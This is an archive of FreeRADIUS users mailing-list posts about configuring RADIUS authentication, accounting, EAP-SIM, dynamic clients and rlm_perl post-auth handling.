EAP-SIM authentication problem at 2nd stage
dear guest, i have problem in eap-sim authentication. I'm using freeradius 2.2.0, blackberry 9220 here my simtripletsdat. file 1510012660372465,AF6876E748BD46bf853A99DC2032F0A7,95762655,449177635B92bc00 1510012660372465,A1A9AC744E8D49819D27A79B067BCA69,257b31c6,64ff9467DEa1e400 1510012660372465,603906BFD8DC404197BAC35FF1274EB3,4F41eb06,F3ce89b4FCbc 1510080332618369,23A95DB79B644a4299463F0342069A11,7775d266,B10f3eba2Bc5ed2b 1510080332618369,FDCE8E4F2B0B4b3086BEF230076EAD58,D9e080d9,E2aad63f711e1324 1510080332618369,238100571AD1495fBCE2AD5505634E41,A40e1656,66a098a750d9cd13 here content of users file 1510080332618369Auth-Type := EAP, EAP-Type := SIM EAP-Sim-Rand1 := 0x23A95DB79B644a4299463F0342069A11, EAP-Sim-SRES1 := 0x7775d266, EAP-Sim-KC1 := 0xB10f3eba2Bc5ed2b, EAP-Sim-Rand2 := 0xFDCE8E4F2B0B4b3086BEF230076EAD58, EAP-Sim-SRES2 := 0xD9e080d9, EAP-Sim-KC2 := 0xE2aad63f711e1324, EAP-Sim-Rand3 := 0x238100571AD1495fBCE2AD5505634E41, EAP-Sim-SRES3 := 0xA40e1656, EAP-Sim-KC3 := 0x66a098a750d9cd13, 1510012660372465 Auth-Type := EAP,EAP-Type := sim EAP-Sim-Rand1 := 0xAF6876E748BD46bf853A99DC2032F0A7, EAP-Sim-SRES1 := 0x95762655, EAP-Sim-KC1 := 0x449177635B92bc00, EAP-Sim-Rand2 := 0xA1A9AC744E8D49819D27A79B067BCA69, EAP-Sim-SRES2 := 0x257b31c6, EAP-Sim-KC2 := 0x64ff9467DEa1e400, EAP-Sim-Rand3 := 0x603906BFD8DC404197BAC35FF1274EB3, EAP-Sim-SRES3 := 0x4F41eb06, EAP-Sim-KC3 := 0xF3ce89b4FCbc, 1510080332618369 at wlan.mnc080.mcc510.3gppnetwork.orgAuth-Type := EAP, EAP-Type := SIM EAP-Sim-Rand1 := 0x23A95DB79B644a4299463F0342069A11, EAP-Sim-SRES1 := 0x7775d266, EAP-Sim-KC1 := 0xB10f3eba2Bc5ed2b, EAP-Sim-Rand2 := 0xFDCE8E4F2B0B4b3086BEF230076EAD58, EAP-Sim-SRES2 := 0xD9e080d9, EAP-Sim-KC2 := 0xE2aad63f711e1324, EAP-Sim-Rand3 := 0x238100571AD1495fBCE2AD5505634E41, EAP-Sim-SRES3 := 0xA40e1656, EAP-Sim-KC3 := 0x66a098a750d9cd13 Already included sim_files in modules and sim { } in eap.conf. I analyze in debug , the firsth authorization success (sim_files return ok status) , the first authenticating success , the second authorization success also, but the problem the second authenticating is failed. Already read in the past list archive, but no clue . Here debug of radius Ready to process requests. rad_recv: Access-Request packet from host 192.168.111.72 port 34647, id=129, length=250 User-Name = 1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org NAS-IP-Address = 192.168.88.52 Called-Station-Id = FA-1A-67-9F-E4-68:NOLSPOT-Secure NAS-Port-Type = Wireless-802.11 NAS-Port = 1 Calling-Station-Id = 70-AA-B2-EF-8E-9D Connect-Info = CONNECT 54Mbps 802.11g Framed-MTU = 1400 EAP-Message = 0x0210003801313531303038303236313833363940776c616e2e6d6e633038302e6d63633531302e336770706e6574776f726b2e6f7267 Message-Authenticator = 0xf0b7f7c3d39dd64797e1ffa08c3c078e # Executing section authorize from file /usr/local/etc/raddb/sites-enabled/default +- entering group authorize {...} ++[preprocess] returns ok ++[chap] returns noop ++[mschap] returns noop ++[digest] returns noop [suffix] Looking up realm wlan.mnc080.mcc510.3gppnetwork.org for User-Name = 1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org [suffix] Found realm wlan.mnc080.mcc510.3gppnetwork.org [suffix] Adding Stripped-User-Name = 1510080332618369 [suffix] Adding Realm = wlan.mnc080.mcc510.3gppnetwork.org [suffix] Authentication realm is LOCAL. ++[suffix] returns ok [files] users: Matched entry 1510080332618369 at line 206 ++[files] returns ok rlm_sim_files: authorized user/imsi 1510080332618369 rlm_sim_files: Adding EAP-Type: eap-sim ++[sim_files] returns ok [eap] EAP packet type response id 16 length 56 [eap] No EAP Start, assuming it's an on-going EAP conversation ++[eap] returns updated [sql] expand: %{User-Name} - 1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org [sql] sql_set_user escaped user -- ' 1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org' rlm_sql (sql): Reserving sql socket id: 4 [sql] expand: SELECT id, username, attribute, value, op FROM radcheck WHERE username = '%{SQL-User-Name}' ORDER BY id - SELECT id, username, attribute, value, op FROM radcheck WHERE username = ' 1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org' ORDER BY id [sql] expand: SELECT groupname FROM radusergroup WHERE username = '%{SQL-User-Name}' ORDER BY priority - SELECT groupname FROM radusergroup WHERE username = ' 1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org' ORDER BY priority rlm_sql (sql): Released sql socket id: 4 [sql] User 1510080332618...@wlan.mnc080.mcc510.3gppnetwork.org not found ++[sql]
Re: Load Balancing
On 2013/02/12 04:45 PM, Alan DeKok wrote: I tried to use Rad Client to send requests in Parallel, but i wasn't succeed. Could you please help me out to send parallel requests to proxy server??? Am I missing something, or can you not simply run more than once instance of radclient on more than one console? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Freeradius several segfaults at heavy load and startup ?
On 2012/11/28 11:50 AM, Phil Mayers wrote: root@itop0-db0:/scripts# LD_PRELOAD=/usr/lib/libperl.so.5.10 Why are you fiddling with LD_PRELOAD? On my debian boxes FR cannot run without preload. There is something on the mailing list about it a while back. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: help - simultaneous accounting
On 2012/10/09 02:21 AM, 劉君羿 wrote: I am using *Chillispot* on my NAS. But it doesn't seem to support CoA. Can you suggest other AP controllers? By the way, I though concurrent accounting was a feature that should be supported. I wonder why it's not supported by the major AAA protocols. Afaik chillispot (coova chilli) DOES support coa. Look for 'coaport' in the config file. With chillispot you can also disconnect the user in the accounting-reply packet. i.e. instead of sending a coa, you can reply to the accounting update packets in a way that will disconnect the user. e.g. Set the remaining time left to 1 second. Look at 'acctupdate' in the chillispot config. Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Very huge Acct-Session-Time
On 2012/05/04 03:13 AM, Claude Brown wrote: Probably not - but what have you got to lose by checking? My 2c says thata Alan de Kock is right. Nas is buggy. What happens on the Nas is probably the following (This is a wild guess) 1) Nas boots, time is set to 1970. 2) User logs in, and Nas stores start time internally. 3) NTP on the Nas eventially figures out what the time is. 4) Next time the Nas calculates the Session time, it is 43 years. I must say I am unsure how I would do it differently if I was the Nas software developer. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Volume Limit per user monthly
On 2012/05/04 09:06 AM, Fajar A. Nugraha wrote: First thing to ask your NAS vendor is whether they support the volume equivalent of session-timeout. For example, chillispot has ChilliSpot-Max-Total-Octets. If it doesn't, then there's no way to enforce the limit using any radius server. Period. Unless You locally keep track of the Total usage in all sessions for the month. When you receive an accoungting update, you do the math. If the user is over, you send a POD. This is how our local telco works with ADSL. Unfortunately you only get Accounting Updates every hour, so you might let a user run for about an hour before you disconnect him, but you dont really have another option. Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: sqlcounter_expire_on_login module
On 2012/05/03 09:37 AM, tonimanel wrote: Hi everybody, I have been looking for how to solve this: A user log in to freeradius, and after the first login, exactly one day later the access should to expire. Example: User: 'aaa' - 1 day (24hours). First login: 2012-04-02 12:00:00 Expires on: 2012-04-03 12:00:00 I have enabled sqlcounter_expire_on_login module, when user log in first time, there are not uses (radacct is empty for this user) but, sqlcounter_expire_on_login's query returns empty set value, not returns a valid value (for example 0) so, when freeradius check the return, says this: Modify your query... select ifnull((The rest of your query),0) It will then return 0 when no records are found. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Setting up FreeRADIUS accounting with IP address logging
Hi! I'm setting up wifi internet in my student dorm (90 people) and thought wpa2 enterprise with FreeRADIUS (version 2.1.8 running on Ubuntu) would be a good solution, together with the incredibly stable Linksys WRT54GL and dd-wrt. There are a few problems I cannot figure out though: 1. How to set up plain-text accounting. I saw in the configuration that the log directory is set to /var/log/freeradius/radacct so I created the directory and made writable (777 to be sure) but alas, there are no logs. 2. How to get freeRADIUS to work with a DHCP server. I'm not asking about the experimental built-in DHCP server, as it seems very limited, but is it possible to somehow log the IP addresses that each user is assigned? We need to know who was using a certain IP address at a certain time. 3. How to connect using Windows. It's dead simple to connect to the network with linux, mac and smartphones but for Windows it seems impossible to find the right combination of settings. I haven't googled this issue so much, so maybe there's a simple answer. Also, it's a later problem. Thankful for a response, Johan P.S. I have attached the radiusd.conf file at the end. I haven't changed much though. Johan Swetzén jo...@swetzen.com radiusd.conf -*- text -*- ## ## radiusd.conf -- FreeRADIUS server configuration file. ## ## http://www.freeradius.org/ ## $Id$ ## ## # # Read man radiusd before editing this file. See the section # titled DEBUGGING. It outlines a method where you can quickly # obtain the configuration you want, without running into # trouble. # # Run the server in debugging mode, and READ the output. # # $ radiusd -X # # We cannot emphasize this point strongly enough. The vast # majority of problems can be solved by carefully reading the # debugging output, which includes warnings about common issues, # and suggestions for how they may be fixed. # # There may be a lot of output, but look carefully for words like: # warning, error, reject, or failure. The messages there # will usually be enough to guide you to a solution. # # If you are going to ask a question on the mailing list, then # explain what you are trying to do, and include the output from # debugging mode (radiusd -X). Failure to do so means that all # of the responses to your question will be people telling you # to post the output of radiusd -X. ## # # The location of other config files and logfiles are declared # in this file. # # Also general configuration for modules can be done in this # file, it is exported through the API to modules that ask for # it. # # See man radiusd.conf for documentation on the format of this # file. Note that the individual configuration items are NOT # documented in that man page. They are only documented here, # in the comments. # # As of 2.0.0, FreeRADIUS supports a simple processing language # in the authorize, authenticate, accounting, etc. sections. # See man unlang for details. # prefix = /usr exec_prefix = /usr sysconfdir = /etc localstatedir = /var sbindir = ${exec_prefix}/sbin logdir = /var/log/freeradius raddbdir = /etc/freeradius radacctdir = ${logdir}/radacct # # name of the running server. See also the -n command-line option. name = freeradius # Location of config and logfiles. confdir = ${raddbdir} run_dir = ${localstatedir}/run/${name} # Should likely be ${localstatedir}/lib/radiusd db_dir = ${raddbdir} # # libdir: Where to find the rlm_* modules. # # This should be automatically set at configuration time. # # If the server builds and installs, but fails at execution time # with an 'undefined symbol' error, then you can use the libdir # directive to work around the problem. # # The cause is usually that a library has been installed on your # system in a place where the dynamic linker CANNOT find it. When # executing as root (or another user), your personal environment MAY # be set up to allow the dynamic linker to find the library. When # executing as a daemon, FreeRADIUS MAY NOT have the same # personalized configuration. # # To work around the problem, find out which library contains that symbol, # and add the directory containing that library to the end of 'libdir', # with a colon separating the directory names. NO spaces are allowed. # # e.g. libdir = /usr/local/lib:/opt/package/lib # # You can also try setting the LD_LIBRARY_PATH environment variable # in a script which starts the server. # # If that does not work, then you can re-configure and re-build the # server to NOT use shared libraries, via: # # ./configure
Re: FreeRadius questions
On 2012/02/28 07:06 PM, James DeLuca wrote: Module: Checking post-auth {...} for more modules to load } radiusd: Opening IP addresses and Ports listen { type = auth ipaddr = 10.0.8.9 You've configures your server to NOT listen on localhost. Sending to localhost will therefore not work. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Configuring freeradius for MACsec
On 2012/02/24 09:38 AM, Alan DeKok wrote: TTLS doesn't generate it. My guess is that Cisco has invented something themselves which defines EAP-Key-Name. Find out what that is, and we can implement it in FreeRADIUS. This? http://tools.ietf.org/html/draft-aboba-radext-wlan-15 -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: FreeRadius to authenticate DHCP Requests with Option82
On 2012/02/22 01:10 PM, Alan DeKok wrote: Yes. If you use FreeRADIUS for both RADIUS and DHCP, you can track user status in a database. When you receive a RADIUS packet, update the database. When you receive a DHCP packet, query the database. Traditional DHCP servers (i.e. ISC) make this hard. They don't talk to databases. They're firmly stuck in 1980's technology. Another option which we use very successfully is a Mikrotik DHCP server. It can talk to Freeradius. http://wiki.mikrotik.com/wiki/Manual:IP/DHCP_Server It works well. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: rlm_perl and returning 1 attribute with same name
On 2012/02/17 02:38 PM, Mike wrote: Hello, I am using rlm_perl and I have an application where I would like to return possibly more than 1 Filter-Id in my response. In perl, the relevent code would be this: $RAD_REPLY{'Filter-Id'} = some_filter Unfortunately, this also will only create 1 avpair by the name 'Filter-Id'. How would I go about returning more than 1 or am I stuck because of perl? I have an array with my Framed-Routes I then do the following: $RAD_REPLY{'Framed-Route'} = \@framedroutearray; -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Last login time in LDAP?
On 2012/02/08 06:24 PM, Phil Mayers wrote: On 08/02/12 15:56, John Doppke wrote: Does someone know if freeradius can update an LDAP user attribute as part of post processing? As far as I'm aware, that's not currently possible via rlm_ldap. You could use a wrapper script around ldapmodify, called via the exec module. Better option might be rlm_perl -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Segfault in 2.1.10 backports version advice
On 2012/01/23 03:20 PM, Alan DeKok wrote: I could upgrade the OS (Lenny to Squeeze). Debugging from this backports version seems an impossible road? Or I could install the -dbg version and perhaps run the server in a screen session? However I have experienced it won't crash if run in debug mode (-X). I reckon in -X it is run in single threaded mode? Yes. Hi, I can confirm the same problem. Version is freeradius-git downloaded about 4 days before 2.1.12 was released. Running with -X it runs forever. (About two months now) Without, it crashes about once a week. Have not had the time to collect debug info. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Radius Client vs. Radius Client-NG
On 2011/12/08 09:05 PM, Alexandre Chapellon wrote: read this: http://freeradius.org/freeradius-client/ from the link below: In late 2006 it was decided that the FreeRADIUS Project should adopt the latest code from radiusclient-ng cvs as the basis of a new FreeRADIUS client package. I personnally use radiusclient-ng I also use radiusclient-ng. Comes as a standard debian package. Never had an issue. -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Change of network adapters in radius server
On 2011/12/02 09:52 AM, Alan DeKok wrote: I've done tests with 50K requests/s for days straight. My smartphone could do 200 requests/s. I must say, freeradius running on a smartphone is quite cool! -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: AK Timeout
Hi, Reading between the lines I suspect the NAS notes means: re-authentiaction timer (aka life time) i.e. re-autentication time (also known as life time) I supect the Nas will re-authenticate ever hour. Freeradius must not consider the session closed if the reauthentication does not arrive (for at least an hour). As Freeradius will not consider the session closed (until it receives an accounting stop). All should be fine. Cheers, Johan On 2011/12/02 01:41 AM, David Peterson wrote: Sigh, I wish I knew. I was hoping it would make sense to someone on this list. I will bug the NAS manufacturer for clarification. David -Original Message- From: freeradius-users-bounces+davidp=wirelessconnections@lists.freeradius.org [mailto:freeradius-users-bounces+davidp=wirelessconnections@lists.freeradius.org] On Behalf Of Alan DeKok Sent: Thursday, December 01, 2011 3:52 PM To: FreeRadius users mailing list Subject: Re: AK Timeout David Peterson wrote: In one of my NAS release notes it mentions: “In the external AAA, the re-authentication timer (AK Life time) should be set to a value higher than 1hour.” Where would I set this? What's an AK life time ? Alan DeKok. - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: radiusd goes wrong
On 2011/11/05 01:41 AM, Ivan Matala wrote: freeradius runs if i use this radiusd -x -f pls help http://www.lmgtfy.com/?q=fix+unix+permissions -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: IPv6 ready?
On 2011/10/31 05:58 PM, Sergio NNX wrote: Thanks Phil. Can you try 'mkdir 0:0:0:0:0:0:0:0' on a Windows box and let mw know if it works? C:\junkmkdir 0:0:0:0:0:0:0:0 The system cannot find the drive specified. C:\junkmkdir '0:0:0:0:0:0:0:0' The filename, directory name, or volume label syntax is incorrect. C:\junkmkdir 0:0:0:0:0:0:0:0 The system cannot find the drive specified. C:\junkmkdir 0\:0\:0\:0\:0\:0\:0\:0 The filename, directory name, or volume label syntax is incorrect. Why not simply remove the Ip address from the log path? Do they HAVE to be in directories with the IP address as part of the name? Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Authorising Clients by Calling Station ID Not IP
On 2011/10/24 09:06 PM, Jennyanydots Napoleon Shoehorn wrote: OH! I've looked too many lines of code over the last week. I have no idea how to patch but will investigate. Was thinking we might have to use nas-id instead. The ultimate intention was to use the mac address of the nas and a nas specific shared secret. In your opinion, are there better ways to deal with dynamic clients? Thanks again Hi, I look up my clients using dynamic clients and Nas-Identifier. You need a module that is not included by default called rlm_raw. You can download a patch here: http://www.sendspace.com/file/f91rqi The last file wont apply cleanly to 2.1.12, just manually add rlm_raw to the src/modules/stable file. (Look at the patch). In your freeradius config, you need to instantiate rlm_raw. /etc/freeradius/radiusd.conf instantiate { raw } You need a module: /etc/freeradius/modules/raw raw { } My dynamic clients config: /etc/freeradius/sites-available/my-dynamic-clients client dymamic { ipaddr = 0.0.0.0 netmask = 0 dynamic_clients = dynamic_nas lifetime = 86400 } server dynamic_nas { authorize { if (%{sql: select count(*) from Nas where Identifier='%{raw:NAS-Identifier}'} == 1) { update control { FreeRADIUS-Client-IP-Address = %{Packet-Src-IP-Address} FreeRADIUS-Client-Require-MA = no FreeRADIUS-Client-Secret = %{sql: select RadiusSecret from Nas where Identifier='%{raw:NAS-Identifier}' and NasTypeID=1} FreeRADIUS-Client-Shortname = %{Packet-Src-IP-Address} FreeRADIUS-Client-NAS-Type = other FreeRADIUS-Client-Virtual-Server = dynamic_server } ok } } } Notes: - dynamic_server is the spesific virtual server than handles the dynamic clients. - the rlm_raw packet MIGHT contain Calling-Station-Id (or do you mean Called-Station-Id??) as well. You will have to look. Hope this helps. Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Rewriting wimax calling-station-id with perl
On 2011/10/05 08:15 PM, James T Mugauri wrote: Hi, As you are undoubtedly aware, the ubuntu/debian package of freeradius comes without the wimax module (despite having the wimax module) installed. My own attempts to compile/install/build deb package for ubuntu always die with the infamous undefined reference to `lt_preloaded_symbols' that apparently has even Alan opting to forsake libtool. Which version of debian do you need packages for? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Post-auth and Rejected logins
Hi, Hope the following makes sense. I have a perl module that runs in post-auth. It checks various things that confirms whether the user may have access and, if not, would turn an Accept into a Reject. I want this perl module to run whether the authentication previously failed or not. I'm using the documented method of the following: post-auth { my_perl Post-Auth-Type REJECT { my_perl } } The problem comes in here. If authentication failed, the module runs once only (in the Post-Auth-Type REJECT stanza) If authentication was OK, and my perl module also OK's the request, it runs once only (in the non Post-Auth_type REJECT stanza). But If the auhtentication as OK, and my perl module then decides to reject the Authentication (by returning RLM_MODULE_REJECT), the perl module runs twice. I've tried swopping around the post-auth section as follows: post-auth { Post-Auth-Type REJECT { my_perl } my_perl } The REJECT stanza is still executed if the non-REJECT stanza turns the accept into a reject. The only solution I can come up with is to set a Tmp-String, and using unlang try to force the perl to not run again. Does anyone know of a more elegant way? Thanks! -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Post-auth and Rejected logins
On 2011/09/26 11:38 PM, Alan DeKok wrote: Johan Meiring wrote: If the auhtentication as OK, and my perl module then decides to reject the Authentication (by returning RLM_MODULE_REJECT), Don't do that. The post-auth section is for running modules AFTER the user has been accepted or rejected. It doesn't make much sense to accept the user, and then reject them. Instead, reject the user earlier in the packet processing. Hi Alan, What you say makes sense. My perl code used to run in the Authorisation section. The reason I moved it down (to post auth), is because some of my queries are very database intensive (complex system). i.e. What I had was: 1) Authorisation (using rlm_perl): Check various stuff If OK so far, create Cleartext-Password, else reject 2) Authentication, PAP/CHAP/whatever What I tried to avoid was that the check various stuff runs if the user supplied the wrong password. I therefore modified the setup as follows: 1) Authorisation - Create Cleartext-Password (using rlm_mysql) 2) Authentication - PAP/CHAP/whatever 3) Post-Auth - Check the various stuff and reject (using rlm_perl) This saves a lot of unnecesary (database) CPU cycles. Using a Tmp-String works. My post-auth now looks as follows: post-auth { my_perl Post-Auth-Type REJECT { if (%{reply:Tmp-String-0} != DONTRUNAGAIN) { my_perl } } } the perl post-auth subrouting simply contains the following: $RAD_REPLY{'Tmp-String-0'} = 'DONTRUNAGAIN'; This works as expected. I was just hoping for a more elegant solutions. Thanks again!! -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
WARNING about auth-type = Local
Hi, I use a completely custom setup. Not using the default server at all. All is working fine, except for a warning. In the authorise section, I have rlm_sql that selects the cleartext password from a database. The query looks like this. authorize_check_query = SELECT AccountID, Login, 'Cleartext-Password', Password, ':=' \ from Account WHERE Login = '%{SQL-User-Name}' } This is the rlm_sql query defined. My authorise and authenticate section looks like this. authorize { authorisation_log chap mschap sql } authenticate { Auth-Type PAP { pap } Auth-Type CHAP { chap } Auth-Type MS-CHAP { mschap } } When a PAP request comes in, just after the sql selects the password and somewhere before authenticate, I get a warning. (Unsure if the warning will appear for CHAP/MSCHAP) - [sql] expand: SELECT AccountID, Login, 'Cleartext-Password', Password, ':=' from Account WHERE Login = '%{SQL-User-Name}' - SELECT AccountID, Login, 'Cleartext-Password', Password, ':=' from Account WHERE Login = 't...@domain.co.za' [sql] User found in radcheck table rlm_sql (sql): Released sql socket id: 1 +++[sql] returns ok ++- else else returns ok WARNING: Please update your configuration, and remove 'Auth-Type = Local' WARNING: Use the PAP or CHAP modules instead. User-Password in the request is correct. # Executing section post-auth from file /etc/freeradius/sites-enabled/custom +- entering group post-auth {...} --- Do I need to concern myself with the warning? All is working fine, I was just enquisitive as to why this happens. Thanks! -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: WARNING about auth-type = Local
On 2011/09/21 06:19 PM, Alan DeKok wrote: Johan Meiring wrote: My authorise and authenticate section looks like this. authorize { authorisation_log chap mschap sql pap } You need the pap module last in the authorize section. It will set Auth-Type for you. In 3.0, the Auth-Type = Local warnings will likely go away, because the server *won't* set it. Instead, you'll just get no Auth-Type Do I need to concern myself with the warning? Yes. Use the pap module as noted above. See the default configuration file for why this is necessary. Hi, Thanks, makes perfect sense. Now it looks like this. -- [sql] User found in radcheck table rlm_sql (sql): Released sql socket id: 2 +++[sql] returns ok ++- else else returns ok ++[chap] returns noop ++[mschap] returns noop ++[pap] returns updated Found Auth-Type = PAP # Executing group from file /etc/freeradius/sites-enabled/custom +- entering group PAP {...} [pap] login attempt with password password [pap] Using clear text password password [pap] User authenticated successfully ++[pap] returns ok # Executing section post-auth from file /etc/freeradius/sites-enabled/custom +- entering group post-auth {...} What now interests me, is how authentication worked at all previously? An invalid password WAS actually rejected, without the pap module showing that it is running. The only reference in the debug that showed that the password was actually checked was one of the following: User-Password in the request is correct or User-Password in the request does NOT match known good password. Failed to authenticate the user. Is that the local module? Thanks again for super support! Even paid support cannot get close to this. Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: MySQL performance
On 2011/09/20 05:22 PM, Lorenzo Milesi wrote: Ok, I missed this, I thought was a suggestion to me :-) http://paste.ubuntu.com/693812/ What is: Can't connect to SNMP agent with SMUX: Connection refused Is an SNMP connetion of some sorts not maybe slowing it down while authenticating? -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Slow DB / outstanding requests
On 2011/09/15 06:35 PM, Alan Buxey wrote: Just a quick question, how many DB connections do you have in your config? 5 Server was a VM with too little RAM. And therefore a simple SQL query could take seconds instead of milliseconds. (Suspect swap meltdown if such a thing exists) Had to wait for the middle of the night to reboot (so more ram could be allocated). Server is now perfectly fine. It was just the first time that I didn't see FR recover after the DB eventually finished with slow queries. Cheers, -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Re: Test
On 2011/09/15 04:49 PM, Alan DeKok wrote: Is the list down, or are people quiet? Suspect they're quiet. Freeradius works too well!! -- Johan Meiring Cape PC Services CC Tel: (021) 883-8271 Fax: (021) 886-7782 Before acting on this email or opening any attachments you should read Cape PC Service's email disclaimer at: http://www.pcservices.co.za/disclaimer.html - List info/subscribe/unsubscribe? See http://www.freeradius.org/list/users.html
Slow DB / outstanding requests
